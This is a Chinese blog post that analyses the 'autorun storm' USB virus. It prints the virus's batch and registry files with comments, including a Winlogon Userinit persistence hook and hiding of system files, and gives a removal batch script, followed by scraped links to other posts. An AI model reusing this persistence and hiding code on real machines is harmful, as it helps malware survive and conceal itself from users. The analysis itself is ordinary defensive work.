症状:计算机里面出现一堆autorun为文件名称的文件,删除后出现找不到autorun.vbs的提示。我就打开当中的一个文件:Autorun.bat,内容例如以下:

@echo off  //不显示系统提示符
rem autorun风暴   //病毒名称:autorun风暴
if exist ./autorun.reg regedit /s ./autorun.reg  //假设存在该文件夹下的autoun.reg注冊表文件写入注冊表
if not "%1"=="" goto open   //注冊表文件导入成功,进入open标记处。
if exist autorun.vbs start WScript.exe autorun.vbs&exit  //假设存在autorun.vbs,则使用WScript.exe将VBS文件执行,然后退出。
if exist %SYSTEMROOT%/system32/autorun.vbs start WScript.exe %SYSTEMROOT%/system32/autorun.vbs&exit  //假设系统文件夹下的system32内有autorun.vbs,那么用WScript.exe执行VBS,然后退出。
exit  //退出
:open  //标记为open
if not "%1"=="Open" goto next  //假设open成功,进入next标记
start explorer ./   //開始当前文件夹
exit  // 退出
:next  //标记为netx
if not "%1"=="Over" goto :next2  //假设标记不成功,进入next2标记
if exist ./autorun.bin type ./autorun.bin >C:/autorun.txt&&exit   //假设当前文件夹存在Autorun.bin,将autorun.bin写入到C盘的autorun.txt文件,然后退出。
if exist %SYSTEMROOT%/system32/autorun.bin type %SYSTEMROOT%/system32/autorun.bin >c:/autorun.txt&&exit  //假设系统文件夹system32下存在Autorun.bin,将autorun.bin写入到C盘的autorun.txt文件,然后退出。
exit   //退出
:next2     //标记为next2
if "%1"=="-" attrib -s -a -h -r %2/autorun.*    //先标记全部autorun开头的文件为非系统、非仅仅读、非隐藏、非..文件
if "%1"=="+" attrib +s +a +h +r %2/autorun.*  //先标记全部autorun开头的文件为系统、仅仅读、隐藏、..文件
:end   //结束

文件二:Autorun.reg

Windows Registry Editor Version 5.00  //Windows 注冊表编辑器 5.00创建
autorun风暴   //autorun风暴
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon]
"Userinit"="userinit.exe,autorun.bat"   //在该条目下的userinit上加入一个autorun.bat运行文件。

[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced]
"ShowSuperHidden"=dword:00000000     //不显示隐藏文件。

我倒,这个病毒还真有点搞笑,连杀毒说明书都写好了,只是,作者显然是个好学生,老师教的要写好凝视真的没错啊!

杀毒方法:

能够制作一个批处理文件来进行,内容例如以下:
@echo on
taskkill /im explorer.exe /f
taskkill /im wscript.exe
start reg add HKCU/SOFTWARE/Microsoft/Windows/CurrentVersion/EXplorer/Advanced /v ShowSuperHidden /t REG_DWORD /d 1 /f
start reg import kill.reg
del c:/autorun.* /f /q /as
del %SYSTEMROOT%/system32/autorun.* /f /q /as
del d:/autorun.* /f /q /as
del e:/autorun.* /f /q /as
del f:/autorun.* /f /q /as
你的盘符多就多写几个
start explorer.exe

运行它即可了。

autorun.vbs病毒的清除办法的更多相关文章

  1. crack.vbs病毒,优盘里所有文件全变成快捷方式

    去了一趟学校打印店,用优盘copy打印了点东西,当时在打印店电脑里打开优盘的时候里面就变成了快捷方式,但没怎么在意.回来之后在自己电脑上居然也这样了.网上一搜是中了crack.vbs病毒了.格式化优盘 ...

  2. VBS病毒实验

    实验目的 探讨VBS病毒实现原理,为更好的深入防御和查杀病毒 实验原理 VBS病毒发生机理 实验内容 编写简单VBS病毒,并实现功能,学习VBS病毒发生机理 实验环境描述 VPC1(虚拟PC) 操作系 ...

  3. lsass 病毒手动清除方法

    病毒症状进程里面有2个lsass.exe进程,一个是system的,一个是当前用户名的(该进程为病毒).双击D:盘打不开,只能通过右击选择打开来打开.用kaspersky扫描可以扫描出来,并且可以杀掉 ...

  4. 关于1KB病毒的清除

    以前中过很多次的1KB病毒,这种病毒来源一般都是U盘,就是去打印店插个U盘,回来插自己电脑发现U盘中毒了. 中毒特征就是根目录下的所有文件夹都变成快捷方式,都只有1KB大小,而根目录下的文件和压缩包不 ...

  5. Oracle 数据库勒索病毒 RushQL 处理办法

    处理办法来自Oracle 官方: https://blogs.oracle.com/cnsupport_news/%E5%AF%B9%E6%95%B0%E6%8D%AE%E5%BA%93%E7%9A% ...

  6. 转:Linux下随机10字符病毒的清除

    病毒表现:网络流量暴满,疯狂地向香港的一个IP发数据,同时在top里面表现为随机的10位字母的进程,看/proc里面的信息,则为ls,cd之类常见的命令,CPU利用率也在top之首.杀死该进程后,会再 ...

  7. VBS脚本病毒特点及如何防范3(转)

    5.Vbs病毒生产机的原理介绍 所谓病毒生产机就是指可以直接根据用户的选择产生病毒源代码的软件.在很多人看来这或许不可思议,其实对脚本病毒而言它的实现非常简单. 脚本语言是解释执行的.不需要编译,程序 ...

  8. android手机登录时遇到“QQ安全登录发现病毒”解决

    android手机作为开源系统非常容易感染病毒,有时候我们会经常遇到手机QQ登录时检测到app被感染,一般情况是由手机感染病毒所引起的,安装腾讯管家后只能检测病毒和卸载感染病毒的软件,不能清除病毒.解 ...

  9. U盘中的autorun.inf

    怎么删除u盘里的autorun.inf 如果U盘中毒,刚插进机子时按住SHIFT五秒,这样就可以跳过预读,这样防止了预读时把病毒感染到机子上,在U盘盘符上点右键,看看有没有“Auto”选项: 1.如果 ...

随机推荐

  1. ruby简单的基本 3

    类 Ruby一切都是对象,它包含了一个恒定.例如,可以使用.class物业查看对象的类型,你可以看一下1.class.你会发现常1类型是Fixnum,1但它是Fixnum的一个例子. Ruby本类cl ...

  2. linux学习(一个) 在unbuntu通过添加新的用户

    最近安装了双系统,开始折腾unbuntu该.Linux系统是一个多用户操作系统,非常多的人才完整的操作需要管理员权限,完全管理员权限是非常重要的.人谁是刚开始学习,般用户的权限即可了,相对于刚開始学习 ...

  3. C++ STL简化了编程

     图1.STL和c++标准模板库 作为C++标准必不可少的一部分,STL应该是渗透在C++程序的角角落落里的. STL不是实验室里的宠儿.也不是程序猿桌上的摆设.她的激动人心并不是昙花一现.本教程旨在 ...

  4. 第三篇——第二部分——第一文 SQL Server镜像简介

    原文:第三篇--第二部分--第一文 SQL Server镜像简介 原文出处:http://blog.csdn.net/dba_huangzj/article/details/26951563 镜像是什 ...

  5. 类似的微博推断客户关系sql声明

    类别似新浪微博的关注和共同关心 不知道别人是怎么设计的. 反正我是例如以下设计的 ID   USER   FRIEND 1     A         B 2      B         A 3   ...

  6. 开始的iOS编程之前的准备

    原地址:http://www.appcoda.com/what-you-need-to-begin-ios-programming/ 1.准备一台苹果设备 这段基本是废话,我就不翻译了,IOS开发你懂 ...

  7. 基本shell编程【3】- 常用的工具awk\sed\sort\uniq\od(转)

    awk awk是个很好用的东西,大量使用在linux系统分析的结果展示处理上.并且可以使用管道, input | awk ''  | output 1.首先要知道形式 awk 'command' fi ...

  8. 建立ORACLE10G DATA GUARD--->Physical Standby

    下面是我自己建Physical Standby,按照下面的步骤一步我一步,当然,打造成功,以下步骤可以作为建筑物Data Guard结构操作手册. HA和DG差额:HA:可以做IP切换自己主动  DG ...

  9. 解决LINUX vncserver 启动 could not open default font 'fixed'错.

    安装vncserver例如,会发生以下错误:  vncext:      VNC extension running!  vncext:      Listening for VNC connecti ...

  10. “NET网络”进行中,多管齐下的人才力挫“”粗俗

            随着互联网的迅猛发展,一些不太干净.低俗的甚至色情的内容不断浮现.不仅严重影响了我们的上网体验,也成为扰乱互联网正常秩序的罪魁祸首,部分不法内容甚至给网民造成了一定的財产损失.在这样的 ...